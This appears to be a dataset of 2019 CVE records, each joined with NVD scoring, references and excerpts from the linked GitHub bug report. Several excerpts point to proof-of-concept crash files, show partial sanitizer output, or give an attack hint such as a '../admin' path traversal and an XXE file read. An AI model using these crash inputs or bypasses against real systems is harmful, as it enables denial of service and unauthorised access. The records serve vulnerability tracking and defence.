CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N The `rest.AnonymousClientConfig()` method returns a copy of the provided config, with credentials removed (bearer token, username/password, and client certificate/key data). In the following versions, `rest.AnonymousClientConfig()` did not effectively clear service acc...
CVE-2019-11243: v1.12.0-v1.12.4, v1.13.0: rest.AnonymousClientConfig() does not remove the serviceaccount credentials from config created by rest.InClusterConfig()
https://api.github.com/repos/kubernetes/kubernetes/issues/76797/comments
2
2019-04-18T21:31:53Z
2022-05-16T21:59:22Z
https://github.com/kubernetes/kubernetes/issues/76797
434,967,981
76,797
340
CVE-2019-11244
2019-04-22T15:29:00.837
In Kubernetes v1.8.x-v1.14.x, schema info is cached by kubectl in the location specified by --cache-dir (defaulting to $HOME/.kube/http-cache), written with world-writeable permissions (rw-rw-rw-). If --cache-dir is specified and pointed at a different location accessible to other users/groups, the written files may be...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 1.9, "confidentialityImpact": "NONE", ...
[ { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/108064" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:3942" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "A57F3AC4-5E09-4C16-91A7-80D54F8F968C", "versionEndExcluding": null, "versionEndIncluding": "1.14.1", "versionStart...
[ "732" ]
732
https://github.com/kubernetes/kubernetes/issues/76676
[ "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
In kubectl v1.8.0+, schema info is cached in the location specified by `--cache-dir` (defaulting to `$HOME/.kube/http-cache`), written with world-writeable permissions (rw-rw-rw-). If `--cache-dir` is specified and pointed at a different location accessible to other users/groups, the written files may be modified by...
CVE-2019-11244: `kubectl --http-cache=<world-accessible dir>` creates world-writeable cached schema files
https://api.github.com/repos/kubernetes/kubernetes/issues/76676/comments
12
2019-04-16T20:14:25Z
2022-10-14T02:06:00Z
https://github.com/kubernetes/kubernetes/issues/76676
433,964,918
76,676
341
CVE-2019-11463
2019-04-23T03:29:00.353
A memory leak in archive_read_format_zip_cleanup in archive_read_support_format_zip.c in libarchive 3.3.4-dev allows remote attackers to cause a denial of service via a crafted ZIP file because of a HAVE_LZMA_H typo. NOTE: this only affects users who downloaded the development code from GitHub. Users of the product's o...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/libarchive/libarchive/commit/ba641f73f3d758d9032b3f0e5597a9c6e593a505" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url"...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libarchive:libarchive:*:*:*:*:*:*:*:*", "matchCriteriaId": "CD8C4D61-FC17-4094-8516-F9DB094DEB8B", "versionEndExcluding": "3.4.0", "versionEndIncluding": null, "versionStartE...
[ "401" ]
401
https://github.com/libarchive/libarchive/issues/1165
[ "Exploit", "Third Party Advisory" ]
github.com
[ "libarchive", "libarchive" ]
I've encountered a memory leak while fuzzing libarchive. A 32-byte reproducer input is attached: [input.zip](https://github.com/libarchive/libarchive/files/3019394/input.zip). Do not extract this zip file -- it is the fuzzed input itself. To reproduce, build latest libarchive with ASAN (`clang -fsanitize=address`) ...
Memory leak when decoding LZMA
https://api.github.com/repos/libarchive/libarchive/issues/1165/comments
6
2019-03-28T17:41:33Z
2019-04-23T22:39:28Z
https://github.com/libarchive/libarchive/issues/1165
426,625,285
1,165
342
CVE-2018-20819
2019-04-23T14:29:00.320
io/ZlibCompression.cc in the decompression component in Dropbox Lepton 1.2.1 allows attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact by crafting a jpg image file. The root cause is a missing check of header payloads that may be (incorrec...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/dropbox/lepton/issues/112" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dropbox:lepton:1.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "6DCDBF54-A4B3-4D67-A014-6ECC38D58621", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
[ "787" ]
787
https://github.com/dropbox/lepton/issues/112
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "dropbox", "lepton" ]
POCs: https://github.com/ntu-sec/pocs/blob/master/lepton-3f6d98c/crashes/hbo_inflate.c:1170_1.lep?raw=true https://github.com/ntu-sec/pocs/blob/master/lepton-3f6d98c/crashes/hbo_inflate.c:1170_2.lep?raw=true ASAN output (`lepton -unjailed $POC /tmp/test.jpg`): ``` lepton v1.0-1.2.1-171-g3f6d98c START ACHIEVED 1...
AddressSanitizer: heap-buffer-overflow at inflate.c:1170
https://api.github.com/repos/dropbox/lepton/issues/112/comments
1
2018-07-17T02:42:05Z
2019-04-09T23:26:40Z
https://github.com/dropbox/lepton/issues/112
341,745,151
112
343
CVE-2018-20820
2019-04-23T14:29:00.367
read_ujpg in jpgcoder.cc in Dropbox Lepton 1.2.1 allows attackers to cause a denial-of-service (application runtime crash because of an integer overflow) via a crafted file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/dropbox/lepton/commit/6a5ceefac1162783fffd9506a3de39c85c725761" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dropbox:lepton:1.2.1:*:*:*:*:*:*:*", "matchCriteriaId": "6DCDBF54-A4B3-4D67-A014-6ECC38D58621", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
[ "190" ]
190
https://github.com/dropbox/lepton/issues/111
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "dropbox", "lepton" ]
We found with our fuzzer an interger overflow error inside `read_ujpg` from jpgcoder.cc when feeding lepton 3f6d98c with a crafted lep file. POC: https://github.com/ntu-sec/pocs/blob/master/lepton-3f6d98c/crashes/iof_jpgcoder.cc:4160_1.lep?raw=true When running `lepton -unjailed $POC /tmp/test.jpg`, it output th...
Integer Overflow at src/lepton/jpgcoder.cc:4160
https://api.github.com/repos/dropbox/lepton/issues/111/comments
0
2018-07-17T02:38:50Z
2019-04-09T23:32:45Z
https://github.com/dropbox/lepton/issues/111
341,744,551
111
344
CVE-2018-20821
2019-04-23T14:29:00.460
The parsing component in LibSass through 3.5.5 allows attackers to cause a denial-of-service (uncontrolled recursion in Sass::Parser::parse_css_variable_value in parser.cpp).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00047.html" }, { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sass-lang:libsass:*:*:*:*:*:*:*:*", "matchCriteriaId": "7377DD2D-250C-48D1-92F9-55C557967804", "versionEndExcluding": null, "versionEndIncluding": "3.5.5", "versionStartExclu...
[ "674" ]
674
https://github.com/sass/libsass/issues/2658
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "sass", "libsass" ]
We found with our fuzzer some stack over flow errors when constructing `String_Schema_Obj` at Line 1808 in parser.cpp (45f50873962b7d1c66bd115ba6e644bdaaf6cac1) when compiled with Address Sanitizer (using sassc as the driver). ``` ASAN:SIGSEGV ================================================================= ==17...
AddressSanitizer: stack-overflow when creating String_Schema_Obj (parser.cpp:1808)
https://api.github.com/repos/sass/libsass/issues/2658/comments
4
2018-06-02T07:13:45Z
2019-06-05T05:35:48Z
https://github.com/sass/libsass/issues/2658
328,721,390
2,658
345
CVE-2018-20822
2019-04-23T14:29:00.540
LibSass 3.5.4 allows attackers to cause a denial-of-service (uncontrolled recursion in Sass::Complex_Selector::perform in ast.hpp and Sass::Inspect::operator in inspect.cpp).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00047.html" }, { "source": "cve@mitre.org", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sass-lang:libsass:3.5.4:*:*:*:*:*:*:*", "matchCriteriaId": "808EA44D-5943-4834-93C2-44D82A5FAADE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcl...
[ "674" ]
674
https://github.com/sass/libsass/issues/2671
[ "Exploit", "Third Party Advisory" ]
github.com
[ "sass", "libsass" ]
We found with our fuzzer some stack over flow errors at Sass::Inspect::operator() (inspect.cpp:977)(45f50873962b7d1c66bd115ba6e644bdaaf6cac1) when compiled with Address Sanitizer (using sassc as the driver). ``` ================================================================= ==2828==ERROR: AddressSanitizer: stac...
AddressSanitizer: stack-overflow at Sass::Inspect::operator() (inspect.cpp:977)
https://api.github.com/repos/sass/libsass/issues/2671/comments
4
2018-06-03T04:54:21Z
2022-10-10T07:16:59Z
https://github.com/sass/libsass/issues/2671
328,799,468
2,671
346
CVE-2019-11470
2019-04-23T14:29:00.600
The cineon parsing component in ImageMagick 7.0.8-26 Q16 allows attackers to cause a denial-of-service (uncontrolled resource consumption) by crafting a Cineon image with an incorrect claimed image size. This occurs because ReadCINImage in coders/cin.c lacks a check for insufficient image data in a file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.1, "confidentialityImpact": "NONE"...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00057.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00001.html" }, { "source": "cve@mit...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-26:q16:*:*:*:*:*:*", "matchCriteriaId": "64AB3C42-4698-4E94-9A4A-F75BA34C7213", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "400" ]
400
https://github.com/ImageMagick/ImageMagick/issues/1472
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to...
Incorrect parsing Cineon causing `convert` to take ridiculous time
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1472/comments
7
2019-02-05T04:29:35Z
2019-04-23T16:45:43Z
https://github.com/ImageMagick/ImageMagick/issues/1472
406,625,350
1,472
347
CVE-2019-11471
2019-04-23T14:29:00.697
libheif 1.4.0 has a use-after-free in heif::HeifContext::Image::set_alpha_channel in heif_context.h because heif_context.cc mishandles references to non-existing alpha images.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/strukturag/libheif/commit/995a4283d8ed2d0d2c1ceb1a577b993df2f0e014" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libheif:1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "6F0C81ED-3820-41B5-8DB0-36E2BC6D993C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclu...
[ "416" ]
416
https://github.com/strukturag/libheif/issues/123
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "strukturag", "libheif" ]
As of dcbfa77, `./heif-convert $FILE /tmp/test.png` may report a heap-use-after-free error when libheif is compiled with AddressSanitizer. ``` ==16294==ERROR: AddressSanitizer: heap-use-after-free on address 0x6030000004a0 at pc 0x7ffff78fe3f6 bp 0x7fffffff89a0 sp 0x7fffffff8998 WRITE of size 8 at 0x6030000004a0 t...
AddressSanitizer: heap-use-after-free at heif_context.h:117
https://api.github.com/repos/strukturag/libheif/issues/123/comments
2
2019-04-14T12:30:34Z
2019-04-28T12:52:59Z
https://github.com/strukturag/libheif/issues/123
432,969,471
123
348
CVE-2019-11472
2019-04-23T14:29:00.837
ReadXWDImage in coders/xwd.c in the XWD image parsing component of ImageMagick 7.0.8-41 Q16 allows attackers to cause a denial-of-service (divide-by-zero error) by crafting an XWD image file in which the header indicates neither LSB first nor MSB first.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00057.html" }, { "source": "cve@mitre.org", "tags": null, "url": "http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00001.html" }, { "source": "cve@mit...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-41:q16:*:*:*:*:*:*", "matchCriteriaId": "34C2A939-19C7-4BC0-8DE5-E3D612C99B0E", "versionEndExcluding": null, "versionEndIncluding": null, "versi...
[ "369" ]
369
https://github.com/ImageMagick/ImageMagick/issues/1546
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to...
FPE errors when reading XWD images
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1546/comments
2
2019-04-14T07:21:12Z
2019-04-24T01:24:42Z
https://github.com/ImageMagick/ImageMagick/issues/1546
432,941,385
1,546
349
CVE-2019-11490
2019-04-24T03:29:00.267
An issue was discovered in Npcap 0.992. Sending a malformed .pcap file with the loopback adapter using either pcap_sendqueue_queue() or pcap_sendqueue_transmit() results in kernel pool corruption. This could lead to arbitrary code executing inside the Windows kernel and allow escalation of privileges.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE",...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nmap/nmap/issues/1568" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nmap:npcap:0.992:*:*:*:*:*:*:*", "matchCriteriaId": "D9F2D880-CB47-4041-9526-2BB17DF1FDD8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding":...
[ "415" ]
415
https://github.com/nmap/nmap/issues/1568
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nmap", "nmap" ]
#### Description: Sending a malformed .pcap with npcap loopback adapter causes kernel pool corruption. #### Analysis: When sending a malformed .pcap file with the npcap loopback adapter using either `pcap_sendqueue_queue()` or `pcap_sendqueue_transmit()` results in kernel pool corruption. This vulnerability co...
Npcap 0.992 Pool Corruption
https://api.github.com/repos/nmap/npcap/issues/308/comments
4
2019-04-22T20:48:04Z
2021-05-01T18:18:38Z
https://github.com/nmap/npcap/issues/308
873,737,308
308
350
CVE-2019-11498
2019-04-24T05:29:00.783
WavpackSetConfiguration64 in pack_utils.c in libwavpack.a in WavPack through 5.1.0 has a "Conditional jump or move depends on uninitialised value" condition, which might allow attackers to cause a denial of service (application crash) via a DFF file that lacks valid sample-rate data.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/dbry/WavPack/commit/bc6cba3f552c44565f7f1e66dc1580189addb2b4" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wavpack:wavpack:*:*:*:*:*:*:*:*", "matchCriteriaId": "A5AF1FF6-17E5-429C-8280-8215E7010571", "versionEndExcluding": null, "versionEndIncluding": "5.1.0", "versionStartExcludi...
[ "824" ]
824
https://github.com/dbry/WavPack/issues/67
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "dbry", "WavPack" ]
[uninit-config.wav.zip](https://github.com/dbry/WavPack/files/2927927/uninit-config.wav.zip) - contains fuzzed input The parsing of the attached file uninit-config.wav leads to a read of an uninitialized location in memory. The uninitialized read can be uncovered using a tool such as [Valgrind](http://valgrind.org/)...
Uninitialized Read in WavpackSetConfiguration64()
https://api.github.com/repos/dbry/WavPack/issues/67/comments
1
2019-03-04T19:43:54Z
2019-03-06T20:05:47Z
https://github.com/dbry/WavPack/issues/67
416,962,329
67
351
CVE-2018-13443
2019-04-24T15:29:00.277
EOS.IO jit-wasm 4.1 has a heap-based buffer overflow via a crafted wast file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PART...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/EOSIO/eos" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/EOSIO/eos/issues/6585" }, { "source": "cve@mi...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:block:jit-wasm:4.1:*:*:*:*:*:*:*", "matchCriteriaId": "8039FA2E-5958-475B-9448-D0653C07C05F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding...
[ "787" ]
787
https://github.com/EOSIO/eos/issues/6585
[ "Exploit", "Third Party Advisory" ]
github.com
[ "EOSIO", "eos" ]
This bug is already reported at hackerone and has been solved It's just public here. Vendor:eosio Affected product:libraries/wasm-jit Product Version: 4.1 Git commit hash:29799eae7bb919e480981e6abf110dfa75198f8d **Summary:** A heap overflow in the jit-wasm which could lead to code execution. In function WA...
A heap-buffer-overflow vunnerability of wasm
https://api.github.com/repos/EOSIO/eos/issues/6585/comments
3
2019-01-11T09:03:58Z
2019-04-28T14:16:27Z
https://github.com/EOSIO/eos/issues/6585
398,193,353
6,585
352
CVE-2017-18367
2019-04-24T21:29:00.243
libseccomp-golang 0.9.0 and earlier incorrectly generates BPFs that OR multiple arguments rather than ANDing them. A process running under a restrictive seccomp filter that specified multiple syscall arguments could bypass intended access restrictions by specifying a single matching argument.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Patch", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2019/04/25/6" }, { "source": "cve@mitre.org", "tags": null, "url": "https://access.redhat.com/errata/RHSA-2019:4087" }, {...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libseccomp-golang_project:libseccomp-golang:*:*:*:*:*:*:*:*", "matchCriteriaId": "6BE659D4-728B-49ED-878F-D0F43E9C2B31", "versionEndExcluding": null, "versionEndIncluding": "0.9.0", ...
[ "20" ]
20
https://github.com/seccomp/libseccomp-golang/issues/22
[ "Patch", "Third Party Advisory" ]
github.com
[ "seccomp", "libseccomp-golang" ]
Issue originally identified at https://github.com/moby/moby/issues/32714 Presently, when adding a rule with multiple syscall arguments, we add each argument separately with a separate call to `seccomp_rule_add_array` and a single syscall specified. This produces an OR relationship between the arguments - IE, we will...
BUG: Handling of multiple syscall arguments incorrect (CVE-2017-18367)
https://api.github.com/repos/seccomp/libseccomp-golang/issues/22/comments
8
2017-04-19T19:56:01Z
2019-04-25T17:21:14Z
https://github.com/seccomp/libseccomp-golang/issues/22
222,852,855
22
353
CVE-2019-11519
2019-04-25T13:29:00.407
Libraries/Nop.Services/Localization/LocalizationService.cs in nopCommerce through 4.10 allows XXE via the "Configurations -> Languages -> Edit Language -> Import Resources -> Upload XML file" screen.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "PARTIAL", ...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/nopSolutions/nopCommerce/issues/3713" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nopcommerce:nopcommerce:*:*:*:*:*:*:*:*", "matchCriteriaId": "AEDDBB73-82A4-4779-8221-396DE3C11935", "versionEndExcluding": null, "versionEndIncluding": "4.10", "versionStart...
[ "611" ]
611
https://github.com/nopSolutions/nopCommerce/issues/3713
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "nopSolutions", "nopCommerce" ]
I believe I have found a zero day which allows an attacker to read files of the server by uploading a XML file in the following: Configurations -> Languages -> Edit Language -> Import Resources -> Upload XML file to perform XXE attack and read files of the server. I used Burp Collaborator to read the files and it...
XXE processing
https://api.github.com/repos/nopSolutions/nopCommerce/issues/3713/comments
2
2019-04-24T03:05:15Z
2023-12-04T04:53:29Z
https://github.com/nopSolutions/nopCommerce/issues/3713
436,475,348
3,713
354
CVE-2019-9900
2019-04-25T15:29:01.497
When parsing HTTP/1.x header values, Envoy 1.9.0 and before does not reject embedded zero characters (NUL, ASCII 0x0). This allows remote attackers crafting header values containing embedded NUL characters to potentially bypass header matching rules, gaining access to unauthorized resources.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/errata/RHSA-2019:0741" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/envoyproxy...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "matchCriteriaId": "BF47B6A7-F357-4074-B90D-8BEB0AB53DC0", "versionEndExcluding": null, "versionEndIncluding": "1.9.0", "versionStartExclud...
[ "74" ]
74
https://github.com/envoyproxy/envoy/issues/6434
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "envoyproxy", "envoy" ]
See https://github.com/envoyproxy/envoy/security/advisories/GHSA-x74r-f4mw-c32h
CVE-2019-9900
https://api.github.com/repos/envoyproxy/envoy/issues/6434/comments
2
2019-03-29T17:02:25Z
2019-11-08T18:11:49Z
https://github.com/envoyproxy/envoy/issues/6434
427,086,406
6,434
355
CVE-2019-9901
2019-04-25T16:29:01.200
Envoy 1.9.0 and before does not normalize HTTP URL paths. A remote attacker may craft a relative path, e.g., something/../admin, to bypass access control, e.g., a block on /admin. A backend server could then interpret the non-normalized path and provide an attacker access beyond the scope provided for by the access con...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Mitigation", "Third Party Advisory" ], "url": "https://github.com/envoyproxy/envoy/issues/6435" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/envoyproxy/envoy/security/advisories/GH...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:envoyproxy:envoy:*:*:*:*:*:*:*:*", "matchCriteriaId": "BF47B6A7-F357-4074-B90D-8BEB0AB53DC0", "versionEndExcluding": null, "versionEndIncluding": "1.9.0", "versionStartExclud...
[ "706" ]
706
https://github.com/envoyproxy/envoy/issues/6435
[ "Issue Tracking", "Mitigation", "Third Party Advisory" ]
github.com
[ "envoyproxy", "envoy" ]
See https://github.com/envoyproxy/envoy/security/advisories/GHSA-xcx5-93pw-jw2w
CVE-2019-9901
https://api.github.com/repos/envoyproxy/envoy/issues/6435/comments
2
2019-03-29T17:03:07Z
2019-11-08T20:38:37Z
https://github.com/envoyproxy/envoy/issues/6435
427,086,726
6,435
356
CVE-2015-9285
2019-04-29T14:29:00.257
esoTalk 1.0.0g4 has XSS via the PATH_INFO to the conversations/ URI.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/esotalk/esoTalk/issues/444" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Mailing List", "Third Party Advisory" ], ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:esotalk:esotalk:1.0.0:g4:*:*:*:*:*:*", "matchCriteriaId": "71C911B3-06FF-4672-B402-4B6F16CF2A45", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclu...
[ "79" ]
79
https://github.com/esotalk/esoTalk/issues/444
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "esotalk", "esoTalk" ]
Hello, Cross-site scripting vulnerability has been announced in [full disclosure mailing list](http://seclists.org/fulldisclosure/2015/Dec/112). According to this Curesec advisory timeline they were unable to contact you: ``` 11/17/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of Disclosure ...
Cross-site scripting vulnerability
https://api.github.com/repos/esotalk/esoTalk/issues/444/comments
14
2015-12-30T06:59:49Z
2019-04-29T15:14:39Z
https://github.com/esotalk/esoTalk/issues/444
124,312,131
444
357
CVE-2016-10749
2019-04-29T14:29:00.363
parse_string in cJSON.c in cJSON before 2016-10-02 has a buffer over-read, as demonstrated by a string that begins with a " character and ends with a \ character.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL",...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/DaveGamble/cJSON/commit/94df772485c92866ca417d92137747b2e3b0a917" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ],...
